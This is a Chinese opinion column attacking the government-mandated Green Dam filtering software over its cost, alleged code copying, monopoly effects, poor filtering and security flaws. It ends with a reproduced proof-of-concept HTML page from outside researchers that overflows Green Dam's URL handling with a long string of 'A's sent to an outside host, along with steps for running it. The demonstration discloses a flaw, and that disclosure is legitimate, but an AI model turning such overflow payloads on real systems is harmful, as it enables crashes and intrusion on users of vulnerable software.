绿坝花季:通知一下,现在开始打劫了啊!

作者:苗得雨  来源:IT牛人网

前几天写了一篇调侃绿坝的文章,只是帮大家解解闷,郁闷的闷。但是那篇文章终归不够有条理,仅用15分钟敲成,也没有深入思考,因此特地补上这篇文章,从多方面思考我们对绿坝的不解和质疑。

文/苗得雨

“绿坝花季”无疑仍然是这个月公众关注的重心,相信在未来的一个月内,它依然不会走出民众的话题和视线中,虽然郑州金惠和北京大正两家公司都默契选择了回避媒体的方法,希望依靠“静音”使事件平息。但是对于任何一个即将购买电脑或者未来会购买电脑的消费者而言,这款会在默认状态下出现在你计算机屏幕中,然后以它自己的主观机器式的看法决定你能够看到哪些信息的软件,恐怕是不会这么轻易的就被大众遗忘的。

郑州金惠雄心勃勃的2010年收入过6亿,也让众多纳税人心惊肉跳,金惠和大正两家企业的盈利目标和收费手段很容易让我们联想起电影《落叶归根》中郭德纲扮演的那个后背纹有“假仗义”三字的劫匪,他上车后的第一句话就是“富贵险中求,恶向胆边生,通知一下,现在开始打劫了啊!”,不过劫匪郭德纲在该剧中还说了一句话:“老子最恨这暗箱操作的人。”

面对公众和媒体的质问,这两家公司竟然略带生硬的将这个皮球直接回踢给了他们坚强的后盾工信部,他们告诉电话采访的记者应该去找工信部提问,因为这款软件是工信部“委托申请”开发的,但此前有关方面似乎一直在说该款软件是招标的胜出者。两个矛盾的说法让整个事件更加迷雾重重。


绿坝花季应开源

既然这是一款帮助孩子过滤淫秽和非法网站的软件,那么它的过滤选择标准,或者专业点儿说它的过滤算法是如何制定过滤标准的呢?毕竟获取信息是公众购买电脑上网的主要目的,而“绿&花”则是以阻拦信息为目的的软件,本身就与购买电脑的初衷背道而驰,因此它的安全性和稳定性更加应该受到关注与考验,

而且作为一款由全民买单强制普及的软件,虽然“绿&花”是一款商业软件,但是由于它此次是全国预装,并花费了纳税人巨额的资金,所以头顶上依然闪耀着国家的光芒,依然相当于一个信息审查单位,而不仅是一个单纯的公司行为,因此哪些非法信息它能够阻拦,哪些信息它认为是安全的,也应该公示给大众。

它依据什么样的标准将它认为是恶意或者对青少年有害的网站添加进入黑名单呢?这种依据是否合法?是否会侵犯到公民的利益?是否会被绿坝方面用来打击竞争对手?万一这款软件的过滤算法有重大瑕疵怎么办?万一它被不法分子利用了怎么办?

目前工信部软件司相关负责人只是称其过滤技术先进,但是先进在哪里?先进是否就意味着稳定和安全呢?而且什么资质的机构和评审认定这款软件先进的呢?这些目前对百姓而言都是迷雾中的盲区,所以对于这样一款关乎到全国人民计算机安全的软件,政府又花费了巨额政府资金买单,那么将其过滤算法开源公示将是最好的办法。

涉嫌商业剽窃

目前最新的事态发展再次表明,“绿&花”软件的迷雾超出了大多人的想象。目前已经有一家名为“Solid Oak Software”的美国软件公司指责“绿&花”软件众多关键组件抄袭了该公司的专利,并且在软件中直接盗用了该公司一款名为“CyberSitter”的过滤软件的动态链接库,甚至在软件的界面设计方面都有抄袭的嫌疑。

根据这家美国公司提供的证据,“绿&花”软件的粗制滥造程度令人乍舌,这款即将在中国共产党建党纪念日后预装到全国电脑中的软件,竟然因为剽窃了这家美国公司软件中的动态链接库,导致“绿坝花季护航”在更新时会先访问CyberSitter的服务器。道理很简单,因为“绿&花”的黑名单信息来源于这家公司,这也就是说这款用来控制中国青少年访问互联网内容的软件所采用的过滤审查标准,竟然来自和我们法律制度与道德观念都不一样的美国,这简直是莫大的讽刺。

此外在图片过滤方面,就有程序员指出,“绿&花”采用了一个名为OpenCV的开源计算机视觉库,这个开源计算机库是英特尔公司基于BSD自由软件许可发行的。而郑州金惠和北京大正却将其余其它一些组件打包拼装成了“绿&花”,并将部分技术注册成为了自己的专利技术,如果这个信息最终被证明为属实,那么这可能将会成为全世界软件界的最大笑柄。

即便最后被证实该软件没有剽窃他人专利技术,“绿&花”目前的有效性仍然值得存疑,例如在一家网站的测试中,该软件认为加菲猫的图片也是“不健康”内容。显然这是这套软件图片过滤算法不成熟的最大体现,根据这套算法目前的糟糕表现,奉劝大家以后在照相时应该尽量穿着“非肉色衣物”,并且避免在游泳馆穿着黑色泳裤,特别是黑色三角泳裤照相。因为穿黑色三角泳裤的男士很可能被“绿&花”误认为你只是一个下体体毛茂盛的裸奔者。

行政权力制造出来的垄断

工信部虽然一直强调该软件预装在电脑中是“附赠”,但是实际上“绿&花”足足消耗了纳税人四千多万的资金,也就说它并不是一款免费的赠品,而是由全民买单的真正意义上的消费商品,并且一夜之间成为了一款独霸同业的垄断商品。

工信部在利用行政资源培育出这样一款天下无敌的过滤软件时,是否考虑到了反垄断法呢?而负责商业领域的商务部是否知会这件事情,并且默许这款软件成为今后可能垄断市场的软件呢?这又是一团迷雾。

目前工信部虽然一直在强调,他们在预装这款软件前曾经与国内主要计算机生产厂商做过沟通,厂商是一片赞同,高度理解和支持。但是工信部显然忘记了征求直接对该款软件买单的广大纳税人的意见,这是多么可笑的一个意见征求方式呀。工信部要花百姓的钱,买一个最终使用者是百姓的商品,却不征询掏钱和最终要使用的百姓意见,反而去询问出售产品的厂商,这些厂商又是受工信部管理的小弟,岂敢说个“不”字。

于是在这场交易中百姓显然成为了最莫名其妙的消费者,如果你到商场请奸商拿着你的钱包帮你买东西,能买来什么也可想而知。总之在工信部权利的管理下,“绿&花”开成了这样一朵垄断的怪胎!

此外工信部在决定在使用具体哪款软件推向公众的时候,是否召集了足够多的软件开发厂商呢?目前从国内几家大型的安全软件企业回答财经杂志记者的答案中看出,显然工信部并没有那么多精力和兴趣联系更多的企业。不过这种明显有倾斜个别企业的做法,是否存在百姓所不知道的内幕和猫腻呢?这些问题的答案恐怕只有参与此次采购的相关企业和政府公务人员心知肚明了。

通过预装“绿&花”不仅自己开成了霸王花,而且也助长了Windows成为垄断系统的气势,之所以这样说是因为目前绿坝花季提供并没有非Windows系统下的安装版本,如果用户的电脑是Linux、MAC等操作系统的怎么办?而且对于电脑厂商而言,非Windows系统以后怎么预装?金惠和大正方面花了纳税人的钱,是否也应该开发Linux和MAC版本的“绿&花”呢?以我个人的观点,既然是全民买单就要开发出符合全民习惯的软件,因此建议金惠和大正开发出从DOS到Linux、UNIX、FreeBSD、麒麟、Windows3.1、Ubuntu、Debian、MAC等等等等……

你无法回答百姓的疑问

除了垄断质疑,工信部在通知中要求所有在7月1日之后出场的电脑都要在系统恢复中预留该软件,也就说用户一旦使用品牌电脑中的一键恢复,恢复完成后的电脑就会直接存在此款软件。外交部发言人秦刚一连串的“你有孩子吗?”似乎击退了国外记者的质疑,但是他无法回答中国百姓的疑惑,难道买电脑的都是孩子吗?

对于政府机构、公司而言,电脑硬盘中预留这样带有监控功能的软件,是否会对政府及公司企事业单位构成泄密威胁呢?对于不了解该款软件的公司或者单位而言,这肯定会增加他们的顾虑和烦恼,仅为了保护孩子这部分社会成本是否太过高昂了?这些都是秦刚这个大概在做爹的人无法回答的吧。

而且如果按照这个逻辑,是不是有一天我开发一款能够模仿“蚊子叫声”的软件,然后和全国爱卫会合作强行让每个电脑安装呢?如果有人质疑,我也可以大声回答,你没有被蚊子咬过吗?你有孩子吗?你的孩子难道不怕蚊子咬吗?蚊子咬了是会得脑炎等一系列疾病的!显然单凭秦刚气势十足的反问句,无法回答我这样的百姓心中的疑问。

当然工信部也没有回答四千万购买资金是如何核算出来的,北京大正与郑州金惠公司背后有何背景?这些无法回答的谜团只能够让百姓产生更多的质疑。

安全与手段

与国内直接会受到此事牵连的中国用户心态不同,国外媒体更加关注这件事情造成的信息封锁问题,显然他们认为“绿&花”不像郭德纲,而更像《天下无贼》中的范伟,因为他的口头禅是:“IC、IP、IQ 卡统统告诉我密码。”

然而就在这款软件确定完全国预装软件不久,美国密西根大学的研究人员就针对“绿坝花季”做了一次分析评估,评估的结果是发现绿坝花季存在多个可以被黑客远程利用的溢出漏洞。这篇分析文章的链接地址是:http://www.cse.umich.edu/~jhalderm/pub/gd/

部分国外黑客认为,如果中国全国的电脑都安装了该款软件,那么对于他们而言,在今后入侵中国计算机时,无疑多了一条快捷而有效的通道,这要比现在依靠挖掘Windows漏洞制造肉鸡群有效的多,而中国无疑也将成为彻头彻尾了的“蠕虫之国”和“肉鸡之国”。

一旦发生因为绿坝花季护航软件造成的用户电脑数据受损,这些损失是否会有人负责并赔付呢?要求“非强制”必须预装的工信部,还是研发出如此漏洞百出的大正和金惠两家公司呢?还是消费者自己?

其实除了强制性的安装,工信部是否有更好的办法可以替代这种极可能造成贪污、浪费、安全问题的强硬手段呢?例如工信部为什么不制作一个中小学生安全软件指导指南手册或网站?只需要简单的将同类型经过工信部验证的产品印刷或者公布到网站上即可,而家长可以根据自己的需求选择是否购买或者安装哪一个软件。这种无须任何花费而又能够避免种种隐患的手段才是更好解决方法。而且工信部还可以向录入指导手册的公司与软件收费评级,虽然这可能成为一个牙防组,但是总过那老百姓的钱硬掏出来要好的多。

所以就请不要把手再伸向百姓的口袋来了!

【绿坝花季护航溢出代码:用户只需要打开写字板,然后将下面这段代码复制粘贴到写字板中,然后另存为HTML文件,使用IE浏览器打开,点击页面中的按钮,就会产生溢出,这仅是目前“绿&花”暴露出的众多安全问题中的一个。】

CODE:

<html>

<head>

<title>Green Dam Vulnerability Demonstration</title>

</head>

<body>

<p>If you"re running Green Dam, clicking this button should crash your browser or tab.</p>

<p>See our <a href="http://www.cse.umich.edu/~jhalderm/pub/gd/">report</a> for details about Green Dam security vulnerabilities.</p>

<center>

<input style="font-size:120%;" type="button" name="demo1" value="Crash Browser!" onclick="javascript:window.location="http://wolchok.org:8000/AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAA.html""></input>

</form></center>

</body>

没有评论: